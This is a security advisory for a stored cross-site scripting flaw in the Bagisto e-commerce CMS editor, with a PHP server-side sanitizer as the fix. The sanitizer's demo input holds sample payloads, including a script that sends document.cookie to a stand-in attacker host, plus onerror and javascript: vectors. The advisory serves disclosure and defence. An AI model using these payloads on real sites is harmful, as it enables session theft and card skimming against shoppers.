CVE-2026-21451

Bagisto Stored XSS: When the CMS Becomes a Skimmer's Paradise

Amit Schendel
Senior Security Researcher

Jan 2, 2026 · 6 min read

Executive Summary (TL;DR)

Bagisto versions prior to 2.3.10 do not sanitize the HTML submitted through the CMS page editor on the server side. The only filtering happens client-side, in the WYSIWYG editor, and an attacker can skip it entirely by editing the request in an intercepting proxy (or by sending the request without the editor at all). An authenticated user with CMS page permissions can therefore store arbitrary JavaScript that runs in the browser of every visitor who opens the page, enabling credit-card skimming or session hijacking.

A classic 'client-side trust' failure in the Bagisto e-commerce platform lets a privileged user bypass the editor's HTML filter and inject malicious JavaScript. Although exploitation requires administrative access, this stored XSS poses a severe threat to storefront customers: the CMS page editor becomes a delivery channel for Magecart-style skimming of payment data entered on the site.
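To make the 'client-side trust' point concrete, here is an added example, not code from Bagisto or from the advisory's author: a minimal server-side allowlist sanitizer in PHP (the language of the Laravel stack Bagisto runs on), run over a constructed payload of the kind a proxy-bypassing editor user would submit. The function names, the wrapper element id, and the tag and attribute allowlists are assumptions chosen for illustration; Bagisto's actual storage and rendering code is not reproduced here.

```php
<?php
// Added illustration for this advisory (not Bagisto's own code): a server-side
// allowlist sanitizer for CMS page HTML, beside the pattern that trusts the
// editor's client-side filtering. Names are hypothetical; the CMS storage and
// rendering layer is assumed rather than shown.

declare(strict_types=1);

/** True for relative URLs and http/https/mailto; false for javascript:, data:, etc. */
function isSafeUrl(string $url): bool
{
    $safeSchemes = ['http', 'https', 'mailto'];
    // Browsers ignore control characters and whitespace inside a scheme
    // ("java\tscript:"), so strip them before inspecting it.
    $cleaned = preg_replace('/[\x00-\x20\x7f]+/', '', $url) ?? '';
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $cleaned, $m)) {
        return true; // no scheme: relative or protocol-relative URL
    }
    return in_array(strtolower($m[1]), $safeSchemes, true);
}

/**
 * Server-side sanitizer: keeps a small allowlist of tags and attributes and
 * removes everything else, so whatever the browser-side editor filtered (or
 * did not) has no bearing on what is stored and rendered.
 */
function sanitizeCmsHtml(string $html): string
{
    $allowedTags = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'h1', 'h2', 'h3',
                    'ul', 'ol', 'li', 'a', 'img', 'div', 'span'];
    // Per-tag attribute allowlist; every on* handler and style is rejected by omission.
    $allowedAttrs = ['a' => ['href', 'title'], 'img' => ['src', 'alt', 'width', 'height']];
    // Elements whose content must be dropped rather than unwrapped.
    $dropWithContent = ['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math', 'template'];

    libxml_use_internal_errors(true); // malformed markup is expected input
    $doc = new DOMDocument();
    // The XML PI forces UTF-8; the wrapper div gives one known root to serialise.
    // Anything that escapes the wrapper (a stray </div>) is simply discarded.
    $doc->loadHTML('<?xml encoding="UTF-8"><div id="cms-root">' . $html . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();

    $xpath = new DOMXPath($doc);
    $root  = $xpath->query('//div[@id="cms-root"]')->item(0);

    // Snapshot first: removing nodes while iterating a live NodeList skips siblings.
    foreach (iterator_to_array($xpath->query('//*'), false) as $el) {
        if ($el->isSameNode($root)) {
            continue;
        }
        $tag = strtolower($el->tagName);
        if (!in_array($tag, $allowedTags, true)) {
            if (!in_array($tag, $dropWithContent, true)) {
                // Unknown but harmless tag: keep its children, drop the tag itself.
                while ($el->firstChild !== null) {
                    $el->parentNode->insertBefore($el->firstChild, $el);
                }
            }
            $el->parentNode->removeChild($el);
            continue;
        }
        $keep  = $allowedAttrs[$tag] ?? [];
        $names = [];
        foreach ($el->attributes as $attr) {
            $names[] = $attr->name; // collect first; removing while iterating is unsafe
        }
        foreach ($names as $name) {
            $lname = strtolower($name);
            $drop  = !in_array($lname, $keep, true);
            if (!$drop && ($lname === 'href' || $lname === 'src')) {
                $drop = !isSafeUrl($el->getAttribute($name));
            }
            if ($drop) {
                $el->removeAttribute($name);
            }
        }
    }

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// --- Demo with constructed input (not taken from the advisory) ----------------
// What a proxy-bypassing editor user submits: the WYSIWYG editor never saw this
// request, so its client-side filter never ran.
$submitted = '<p>Welcome to our store!</p>'
    . '<script>fetch("https://attacker.example/c?d=" + encodeURIComponent(document.cookie))</script>'
    . '<img src="x" onerror="alert(document.domain)">'
    . '<a href="javascript:alert(1)">Click</a>'
    . '<a href="https://example.com/help">Help</a>';

// Vulnerable pattern: store the submitted HTML as-is and later echo it unescaped
// (Blade's raw {!! ... !!} syntax); every storefront visitor runs the script.
$storedVulnerable = $submitted;

// Hardened pattern: sanitize on the server before storing, and ideally again
// before rendering, regardless of what the editor claims to have filtered.
$storedHardened = sanitizeCmsHtml($submitted);

echo $storedHardened, PHP_EOL;
```

Run it with `php sanitize.php`: the printed markup keeps the paragraph, the image (minus its onerror handler) and the https link, while the script element and the javascript: href are gone. The lesson is where the filtering runs, not how clever the editor's filter is: the browser-side editor can be skipped entirely, so the server must treat submitted HTML as untrusted even from an administrator, and an allowlist of tags and attributes (rather than a blocklist of known-bad ones) is the usual fix. For production code, a maintained library such as HTML Purifier handles far more parser edge cases than this sketch.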


Technical Appendix

CVSS Score
5.2 / 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P

Affected Systems

Bagisto eCommerce Platform
Laravel applications using vulnerable Bagisto packages

Affected Versions Detail

Product: Bagisto (Webkul)
Affected Versions: < 2.3.10
Fixed Version: 2.3.10
Attribute / Detail

CWE ID: CWE-79
CVSS v4.0: 5.2 (Medium)
Attack Vector: Network (Authenticated)
Privileges Required: High (Admin)
Impact: Stored XSS / Data Exfiltration
Fix Version: 2.3.10

CWE-79: Cross-site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Vulnerability Timeline

Fix committed to repository
2025-12-24
CVE-2026-21451 Published
2026-01-02
Bagisto v2.3.10 Released
2026-01-02
